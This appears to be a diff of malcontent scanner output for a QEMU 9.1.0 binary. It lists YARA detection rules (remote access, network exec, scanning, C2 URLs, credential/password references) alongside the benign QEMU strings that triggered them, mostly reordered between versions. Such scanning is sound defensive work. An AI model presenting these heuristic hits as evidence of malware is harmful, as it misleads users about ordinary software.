[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/hotplug.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fhotplug.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/i2c/i2c.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fi2c%2Fi2c.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb/msd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb%2Fmsd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/net/filter.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fnet%2Ffilter.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/bswap.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fbswap.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/range.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Frange.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/rng.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Frng.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/tpm.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Ftpm.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/console.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fconsole.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/boards.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fboards.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sysbus.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsysbus.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/clock.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fclock.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sd/sd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsd%2Fsd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/iov.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fiov.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/rcu.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Frcu.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/block/block-gen.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Fblock%2Fblock-gen.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/hw/usb/hcd-ehci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Fhw%2Fusb%2Fhcd-ehci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/nmi.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fnmi.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb.h&type=code)
[/tmp/perf-%d.map](https://github.com/search?q=%2Ftmp%2Fperf-%25d.map&type=code) | | MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | | MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%d/cmdline](https://github.com/search?q=%2Fproc%2F%25d%2Fcmdline&type=code) | | MEDIUM | [fs/proc/pid_cmdline](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/pid-cmdline.yara#proc_d_cmdline) | access command-line of other processes | [/proc/%d/cmdline](https://github.com/search?q=%2Fproc%2F%25d%2Fcmdline&type=code) | | MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | -| MEDIUM | [hw/dev/block_ice](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/block-device.yara#block_devices) | works with block devices | [/dev/block/%u](https://github.com/search?q=%2Fdev%2Fblock%2F%25u&type=code)
[/sys/dev/block](https://github.com/search?q=%2Fsys%2Fdev%2Fblock&type=code) | +| MEDIUM | [hw/dev/block_ice](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/block-device.yara#block_devices) | works with block devices | [/sys/dev/block](https://github.com/search?q=%2Fsys%2Fdev%2Fblock&type=code)
[/dev/block/%u](https://github.com/search?q=%2Fdev%2Fblock%2F%25u&type=code) | | MEDIUM | [impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent) | references an 'agent' | [vdagent](https://github.com/search?q=vdagent&type=code) | -| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [06zu:qmp_enter_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_enter_x_colo_lost_heartbeat&type=code)
[06zu:qmp_exit_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_exit_x_colo_lost_heartbeat&type=code)
[Tell COLO that heartbeat is lost](https://github.com/search?q=Tell+COLO+that+heartbeat+is+lost&type=code)
[hmp_x_colo_lost_heartbeat](https://github.com/search?q=hmp_x_colo_lost_heartbeat&type=code)
[qmp_marshal_x_colo_lost_heartbeat](https://github.com/search?q=qmp_marshal_x_colo_lost_heartbeat&type=code)
[qmp_x_colo_lost_heartbeat](https://github.com/search?q=qmp_x_colo_lost_heartbeat&type=code) | -| MEDIUM | [impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#exec_chdir_and_socket) | executes commands, changes directories, accesses remote hosts | [chdir](https://github.com/search?q=chdir&type=code)
[execve](https://github.com/search?q=execve&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [06zu:qmp_enter_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_enter_x_colo_lost_heartbeat&type=code)
[06zu:qmp_exit_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_exit_x_colo_lost_heartbeat&type=code)
[qmp_marshal_x_colo_lost_heartbeat](https://github.com/search?q=qmp_marshal_x_colo_lost_heartbeat&type=code)
[Tell COLO that heartbeat is lost](https://github.com/search?q=Tell+COLO+that+heartbeat+is+lost&type=code)
[hmp_x_colo_lost_heartbeat](https://github.com/search?q=hmp_x_colo_lost_heartbeat&type=code)
[qmp_x_colo_lost_heartbeat](https://github.com/search?q=qmp_x_colo_lost_heartbeat&type=code) | +| MEDIUM | [impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#exec_chdir_and_socket) | executes commands, changes directories, accesses remote hosts | [execve](https://github.com/search?q=execve&type=code)
[socket](https://github.com/search?q=socket&type=code)
[chdir](https://github.com/search?q=chdir&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[connect](https://github.com/search?q=connect&type=code)
[Target](https://github.com/search?q=Target&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[probe](https://github.com/search?q=probe&type=code)
[Port](https://github.com/search?q=Port&type=code)
[port](https://github.com/search?q=port&type=code)
[scan](https://github.com/search?q=scan&type=code) | | MEDIUM | [mem/anonymous_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/mem/anonymous-file.yara#memfd_create) | create an anonymous file | [memfd_create](https://github.com/search?q=memfd_create&type=code) | | MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | | MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [258EAFA5-E914-47DA-95CA-C5AB0DC85B11](https://github.com/search?q=258EAFA5-E914-47DA-95CA-C5AB0DC85B11&type=code)
[WebSocket](https://github.com/search?q=WebSocket&type=code) | -| MEDIUM | [net/ip/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#host_port_ref) | connects to an arbitrary hostname:port | $host_port
[host and port](https://github.com/search?q=host+and+port&type=code)
[host and/or port](https://github.com/search?q=host+and%2For+port&type=code)
[host from port](https://github.com/search?q=host+from+port&type=code)
[host is not support](https://github.com/search?q=host+is+not+support&type=code)
[host port](https://github.com/search?q=host+port&type=code)
[host transport](https://github.com/search?q=host+transport&type=code)
[host,addr.port=port](https://github.com/search?q=host%2Caddr.port%3Dport&type=code)
[host/port](https://github.com/search?q=host%2Fport&type=code)
[host:port](https://github.com/search?q=host%3Aport&type=code)
[host=addr,local.port](https://github.com/search?q=host%3Daddr%2Clocal.port&type=code)
[host=host,addr.port](https://github.com/search?q=host%3Dhost%2Caddr.port&type=code)
[host=host],port=port](https://github.com/search?q=host%3Dhost%5D%2Cport%3Dport&type=code)
[host]:port](https://github.com/search?q=host%5D%3Aport&type=code)
[host_get_port](https://github.com/search?q=host_get_port&type=code)
[host_support](https://github.com/search?q=host_support&type=code)
[host_user.support](https://github.com/search?q=host_user.support&type=code)
[host_user_support](https://github.com/search?q=host_user_support&type=code)
[hostaddr]:hostport](https://github.com/search?q=hostaddr%5D%3Ahostport&type=code)
[hostname port](https://github.com/search?q=hostname+port&type=code)
[hostname:s,port](https://github.com/search?q=hostname%3As%2Cport&type=code) | +| MEDIUM | [net/ip/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#host_port_ref) | connects to an arbitrary hostname:port | [host=addr,local.port](https://github.com/search?q=host%3Daddr%2Clocal.port&type=code)
[host=host],port=port](https://github.com/search?q=host%3Dhost%5D%2Cport%3Dport&type=code)
[host is not support](https://github.com/search?q=host+is+not+support&type=code)
[host,addr.port=port](https://github.com/search?q=host%2Caddr.port%3Dport&type=code)
[host=host,addr.port](https://github.com/search?q=host%3Dhost%2Caddr.port&type=code)
[hostaddr]:hostport](https://github.com/search?q=hostaddr%5D%3Ahostport&type=code)
[host_user.support](https://github.com/search?q=host_user.support&type=code)
[host_user_support](https://github.com/search?q=host_user_support&type=code)
[host and/or port](https://github.com/search?q=host+and%2For+port&type=code)
[hostname:s,port](https://github.com/search?q=hostname%3As%2Cport&type=code)
[host from port](https://github.com/search?q=host+from+port&type=code)
[host transport](https://github.com/search?q=host+transport&type=code)
[host and port](https://github.com/search?q=host+and+port&type=code)
[host_get_port](https://github.com/search?q=host_get_port&type=code)
[hostname port](https://github.com/search?q=hostname+port&type=code)
[host_support](https://github.com/search?q=host_support&type=code)
[host]:port](https://github.com/search?q=host%5D%3Aport&type=code)
[host port](https://github.com/search?q=host+port&type=code)
[host/port](https://github.com/search?q=host%2Fport&type=code)
[host:port](https://github.com/search?q=host%3Aport&type=code)
[host_port](https://github.com/search?q=host_port&type=code) | | MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping 0x](https://github.com/search?q=ping+0x&type=code) | | MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | | MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntoa](https://github.com/search?q=inet_ntoa&type=code) | -| MEDIUM | [net/proxy/tunnel](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [crypto](https://github.com/search?q=crypto&type=code)
[proxy](https://github.com/search?q=proxy&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code) | -| MEDIUM | [net/remote_control/vnc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/remote_control/vnc.yara#vnc_user) | uses VNC remote desktop protocol | [VNC_](https://github.com/search?q=VNC_&type=code)
[vnc_password](https://github.com/search?q=vnc_password&type=code) | +| MEDIUM | [net/proxy/tunnel](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [crypto](https://github.com/search?q=crypto&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code)
[proxy](https://github.com/search?q=proxy&type=code) | +| MEDIUM | [net/remote_control/vnc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/remote_control/vnc.yara#vnc_user) | uses VNC remote desktop protocol | [vnc_password](https://github.com/search?q=vnc_password&type=code)
[VNC_](https://github.com/search?q=VNC_&type=code) | | MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | listen on a socket | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | | MEDIUM | [net/socket/pair](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/pair.yara#socket_pair) | create a pair of connected sockets | [socketpair](https://github.com/search?q=socketpair&type=code) | | MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | | MEDIUM | [net/tcp/sftp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/sftp.yara#sftp) | Supports sftp (FTP over SSH) | [sftp](https://github.com/search?q=sftp&type=code)
[ssh](https://github.com/search?q=ssh&type=code) | | MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Supports SSH (secure shell) | [SSH](https://github.com/search?q=SSH&type=code) | | MEDIUM | [net/tun_tap](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tun_tap.yara#tun_tap) | accesses the TUN/TAP device driver | [/dev/net/tun](https://github.com/search?q=%2Fdev%2Fnet%2Ftun&type=code) | -| MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [-daemon](https://github.com/search?q=-daemon&type=code)
[daemonize](https://github.com/search?q=daemonize&type=code)
[is_daemon](https://github.com/search?q=is_daemon&type=code)
[os_daemon](https://github.com/search?q=os_daemon&type=code)
[os_set_daemon](https://github.com/search?q=os_set_daemon&type=code)
[qemu_daemon](https://github.com/search?q=qemu_daemon&type=code) | +| MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [os_set_daemon](https://github.com/search?q=os_set_daemon&type=code)
[qemu_daemon](https://github.com/search?q=qemu_daemon&type=code)
[daemonize](https://github.com/search?q=daemonize&type=code)
[is_daemon](https://github.com/search?q=is_daemon&type=code)
[os_daemon](https://github.com/search?q=os_daemon&type=code)
[-daemon](https://github.com/search?q=-daemon&type=code) | | MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [pid_file](https://github.com/search?q=pid_file&type=code) | | MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [d is not known!!](https://github.com/search?q=d+is+not+known%21%21&type=code) | -| MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [intercept_dev](https://github.com/search?q=intercept_dev&type=code)
[intercept_gpio_out](https://github.com/search?q=intercept_gpio_out&type=code)
[intercept_in](https://github.com/search?q=intercept_in&type=code)
[intercept_out](https://github.com/search?q=intercept_out&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | +| MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [intercept_gpio_out](https://github.com/search?q=intercept_gpio_out&type=code)
[intercept_dev](https://github.com/search?q=intercept_dev&type=code)
[intercept_out](https://github.com/search?q=intercept_out&type=code)
[intercept_in](https://github.com/search?q=intercept_in&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | | MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | -| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [http://wikipedia.org/wiki/WAV](http://wikipedia.org/wiki/WAV)
[http://www.opensound.com](http://www.opensound.com)
[https://qemu.org/contribute/report](https://qemu.org/contribute/report)
[https://wiki.qemu.org/Documentation/9psetup](https://wiki.qemu.org/Documentation/9psetup) | -| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [http://](http://)
[https://](https://)
[x86_64](https://github.com/search?q=x86_64&type=code) | -| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [Cannot derive password](https://github.com/search?q=Cannot+derive+password&type=code)
[Could not set password expire time](https://github.com/search?q=Could+not+set+password+expire+time&type=code)
[Invalid password](https://github.com/search?q=Invalid+password&type=code)
[SetPasswordAction_lookup](https://github.com/search?q=SetPasswordAction_lookup&type=code)
[change-vnc-password](https://github.com/search?q=change-vnc-password&type=code)
[enter_expire_password](https://github.com/search?q=enter_expire_password&type=code)
[exit_change_vnc_password](https://github.com/search?q=exit_change_vnc_password&type=code)
[hmp_expire_password](https://github.com/search?q=hmp_expire_password&type=code)
[hmp_set_password](https://github.com/search?q=hmp_set_password&type=code)
[marshal_expire_password](https://github.com/search?q=marshal_expire_password&type=code)
[monitor_read_password](https://github.com/search?q=monitor_read_password&type=code)
[not support password prompting](https://github.com/search?q=not+support+password+prompting&type=code)
[obj_change_vnc_password_arg_members](https://github.com/search?q=obj_change_vnc_password_arg_members&type=code)
[password is expired](https://github.com/search?q=password+is+expired&type=code)
[password is not set](https://github.com/search?q=password+is+not+set&type=code)
[please enable password auth using](https://github.com/search?q=please+enable+password+auth+using&type=code)
[prop_get_passwordid](https://github.com/search?q=prop_get_passwordid&type=code)
[prop_set_passwordid](https://github.com/search?q=prop_set_passwordid&type=code)
[protocol password](https://github.com/search?q=protocol+password&type=code)
[proxy-password-secret](https://github.com/search?q=proxy-password-secret&type=code)
[qapi_free_ExpirePasswordOptionsVnc](https://github.com/search?q=qapi_free_ExpirePasswordOptionsVnc&type=code)
[qapi_free_SetPasswordOptionsVnc](https://github.com/search?q=qapi_free_SetPasswordOptionsVnc&type=code)
[qmp_change_vnc_password](https://github.com/search?q=qmp_change_vnc_password&type=code)
[qmp_enter_set_password](https://github.com/search?q=qmp_enter_set_password&type=code)
[qmp_exit_expire_password](https://github.com/search?q=qmp_exit_expire_password&type=code)
[qmp_exit_set_password](https://github.com/search?q=qmp_exit_set_password&type=code)
[qmp_expire_password](https://github.com/search?q=qmp_expire_password&type=code)
[qmp_marshal_set_password](https://github.com/search?q=qmp_marshal_set_password&type=code)
[qmp_set_password](https://github.com/search?q=qmp_set_password&type=code)
[that match this password](https://github.com/search?q=that+match+this+password&type=code)
[type_ExpirePasswordOptionsVnc](https://github.com/search?q=type_ExpirePasswordOptionsVnc&type=code)
[type_ExpirePasswordOptions_members](https://github.com/search?q=type_ExpirePasswordOptions_members&type=code)
[visit_type_SetPasswordAction](https://github.com/search?q=visit_type_SetPasswordAction&type=code)
[visit_type_SetPasswordOptionsVnc](https://github.com/search?q=visit_type_SetPasswordOptionsVnc&type=code)
[visit_type_SetPasswordOptions_members](https://github.com/search?q=visit_type_SetPasswordOptions_members&type=code)
[vnc password expire-time](https://github.com/search?q=vnc+password+expire-time&type=code)
[vnc_display_password](https://github.com/search?q=vnc_display_password&type=code) | +| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [https://wiki.qemu.org/Documentation/9psetup](https://wiki.qemu.org/Documentation/9psetup)
[https://qemu.org/contribute/report](https://qemu.org/contribute/report)
[http://wikipedia.org/wiki/WAV](http://wikipedia.org/wiki/WAV)
[http://www.opensound.com](http://www.opensound.com) | +| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[http://](http://)
[x86_64](https://github.com/search?q=x86_64&type=code) | +| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [visit_type_SetPasswordOptions_members](https://github.com/search?q=visit_type_SetPasswordOptions_members&type=code)
[obj_change_vnc_password_arg_members](https://github.com/search?q=obj_change_vnc_password_arg_members&type=code)
[Could not set password expire time](https://github.com/search?q=Could+not+set+password+expire+time&type=code)
[qapi_free_ExpirePasswordOptionsVnc](https://github.com/search?q=qapi_free_ExpirePasswordOptionsVnc&type=code)
[type_ExpirePasswordOptions_members](https://github.com/search?q=type_ExpirePasswordOptions_members&type=code)
[please enable password auth using](https://github.com/search?q=please+enable+password+auth+using&type=code)
[visit_type_SetPasswordOptionsVnc](https://github.com/search?q=visit_type_SetPasswordOptionsVnc&type=code)
[qapi_free_SetPasswordOptionsVnc](https://github.com/search?q=qapi_free_SetPasswordOptionsVnc&type=code)
[not support password prompting](https://github.com/search?q=not+support+password+prompting&type=code)
[type_ExpirePasswordOptionsVnc](https://github.com/search?q=type_ExpirePasswordOptionsVnc&type=code)
[visit_type_SetPasswordAction](https://github.com/search?q=visit_type_SetPasswordAction&type=code)
[SetPasswordAction_lookup](https://github.com/search?q=SetPasswordAction_lookup&type=code)
[exit_change_vnc_password](https://github.com/search?q=exit_change_vnc_password&type=code)
[qmp_exit_expire_password](https://github.com/search?q=qmp_exit_expire_password&type=code)
[qmp_marshal_set_password](https://github.com/search?q=qmp_marshal_set_password&type=code)
[that match this password](https://github.com/search?q=that+match+this+password&type=code)
[vnc password expire-time](https://github.com/search?q=vnc+password+expire-time&type=code)
[marshal_expire_password](https://github.com/search?q=marshal_expire_password&type=code)
[qmp_change_vnc_password](https://github.com/search?q=qmp_change_vnc_password&type=code)
[Cannot derive password](https://github.com/search?q=Cannot+derive+password&type=code)
[qmp_enter_set_password](https://github.com/search?q=qmp_enter_set_password&type=code)
[enter_expire_password](https://github.com/search?q=enter_expire_password&type=code)
[monitor_read_password](https://github.com/search?q=monitor_read_password&type=code)
[proxy-password-secret](https://github.com/search?q=proxy-password-secret&type=code)
[qmp_exit_set_password](https://github.com/search?q=qmp_exit_set_password&type=code)
[vnc_display_password](https://github.com/search?q=vnc_display_password&type=code)
[change-vnc-password](https://github.com/search?q=change-vnc-password&type=code)
[hmp_expire_password](https://github.com/search?q=hmp_expire_password&type=code)
[password is expired](https://github.com/search?q=password+is+expired&type=code)
[password is not set](https://github.com/search?q=password+is+not+set&type=code)
[prop_get_passwordid](https://github.com/search?q=prop_get_passwordid&type=code)
[prop_set_passwordid](https://github.com/search?q=prop_set_passwordid&type=code)
[qmp_expire_password](https://github.com/search?q=qmp_expire_password&type=code)
[protocol password](https://github.com/search?q=protocol+password&type=code)
[Invalid password](https://github.com/search?q=Invalid+password&type=code)
[hmp_set_password](https://github.com/search?q=hmp_set_password&type=code)
[qmp_set_password](https://github.com/search?q=qmp_set_password&type=code) | | LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [private_key](https://github.com/search?q=private_key&type=code) | | LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code) | | LOW | [crypto/public_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/public_key.yara#public_key) | references a 'public key' | [public key](https://github.com/search?q=public+key&type=code)
[public_key](https://github.com/search?q=public_key&type=code)
[publickey](https://github.com/search?q=publickey&type=code) | @@ -71,9 +71,9 @@ | LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [discover/system/dmesg](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/dmesg.yara#dmesg) | accesses the kernel log ring buffer | [dmesg](https://github.com/search?q=dmesg&type=code) | | LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | -| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [getenv](https://github.com/search?q=getenv&type=code)
[USER](https://github.com/search?q=USER&type=code) | | LOW | [evasion/logging/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/acct.yara#acct) | switch process accounting on or off | [acct](https://github.com/search?q=acct&type=code) | -| LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [Could not load plugin](https://github.com/search?q=Could+not+load+plugin&type=code)
[Plugin options](https://github.com/search?q=Plugin+options&type=code)
[cap_disas_plugin](https://github.com/search?q=cap_disas_plugin&type=code)
[gen_plugin_u64_ptr](https://github.com/search?q=gen_plugin_u64_ptr&type=code)
[load a plugin](https://github.com/search?q=load+a+plugin&type=code)
